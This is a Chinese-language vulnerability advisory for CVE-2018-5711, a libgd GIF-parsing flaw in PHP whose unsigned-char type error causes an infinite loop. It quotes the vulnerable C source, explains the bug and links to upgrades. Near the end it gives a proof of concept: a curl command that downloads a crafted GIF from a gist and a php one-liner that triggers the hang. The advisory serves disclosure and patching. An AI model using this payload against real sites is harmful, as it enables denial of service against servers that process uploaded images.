PHP Libgd存在拒絕服務漏洞一張GIF可能導致服務器宕機

PHP GD Graphics Library存在拒絕服務漏洞-CVE-2018-5711（CNVD收錄編號爲CNVD-2018-02505），可導致服務器計算資源大量消耗，直至崩潰宕機。

GD Graphics Library（libgd）是用來動態創建圖像的開源圖形軟件庫，主要用在圖像驗證碼、頭像、網絡相冊等方面，用戶使用十分廣泛。GD圖形庫中的gd_gif_in.c存在整數簽名錯誤，通過特殊構造的GIF文件使程序在調用imagecreatefromgif或imagecreatefromstring的PHP函數時導致無限循環。漏洞細節及利用代碼在互聯網公開，使用GD庫處理圖像的站點基本上會中招，危害較大。

出現漏洞的文件爲 ext/gd/libgd/gd_gif_in.c 具體代碼如下：

do {
                        sd->firstcode = sd->oldcode =
                        GetCode(fd, &sd->scd, sd->code_size, FALSE, ZeroDataBlockP);
                } while (sd->firstcode == sd->clear_code);

static int
GetCode_(gdIOCtx *fd, CODE_STATIC_DATA *scd, int code_size, int flag, int *ZeroDataBlockP)
{
        int           i, j, ret;
        unsigned char count;

        if (flag) {
                scd->curbit = 0;
                scd->lastbit = 0;
                scd->last_byte = 0;
                scd->done = FALSE;
                return 0;
        }

        if ( (scd->curbit + code_size) >= scd->lastbit) {
                if (scd->done) {
                        if (scd->curbit >= scd->lastbit) {
                                /* Oh well */
                        }
                        return -1;
                }
                scd->buf[0] = scd->buf[scd->last_byte-2];
                scd->buf[1] = scd->buf[scd->last_byte-1];

               if ((count = GetDataBlock(fd, &scd->buf[2], ZeroDataBlockP)) <= 0)
                        scd->done = TRUE;

                scd->last_byte = 2 + count;
                scd->curbit = (scd->curbit - scd->lastbit) + 16;
                scd->lastbit = (2+count)*8 ;
        }

        if ((scd->curbit + code_size - 1) >= (CSD_BUF_SIZE * 8)) {
                ret = -1;
        } else {
                ret = 0;
                for (i = scd->curbit, j = 0; j < code_size; ++i, ++j) {
                        ret |= ((scd->buf[i / 8] & (1 << (i % 8))) != 0) << j;
                }
        }

        scd->curbit += code_size;
        return ret;
}

GetCode會調用GetDataBlock函數讀取GIF圖中的數據。

static int
GetDataBlock_(gdIOCtx *fd, unsigned char *buf, int *ZeroDataBlockP)
{
        unsigned char   count;

        if (! ReadOK(fd,&count,1)) {
                return -1;
        }

        *ZeroDataBlockP = count == 0;

        if ((count != 0) && (! ReadOK(fd, buf, count))) {
                return -1;
        }

        return count;
}

該漏洞依賴於從整形（int）到無符號字符（unsigned char）的類型轉換。如果GetDataBlock_返回-1，則第400行中的scd->done將會被設置爲True，並停止while循環。但是其定義的count是無符號字符，它總是從0到255的正數，所以這種循環停止動作是不會被觸發執行的，遠程攻擊者通過構造的GIF文件調用PHP函數imagecreatefromgif或imagecreatefromstring可導致無限循環，耗盡服務器資源，造成拒絕服務攻擊。

POC:

$ curl https://gist.githubusercontent.com/orangetw/adb0e2519df267eb54d8b68027a91d4c/raw/7a7d6938f59dd89e9a9b7304d71f8f6640609479/poc.gif.xxd | xxd -r > poc.gif

$ php -r 'imagecreatefromgif("poc.gif");'

Linux 直接調用函數進行測試如下：

Windows 搭建WEB環境測試如下：

解決方案：

PHP廠商已在最新版本中修復了該漏洞：http://php.net/downloads.php

Libgd暫未發佈新版本，請及時關注廠商主頁：http://libgd.github.io/

參考鏈接：

http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5711

http://www.cnvd.org.cn/webinfo/show/4405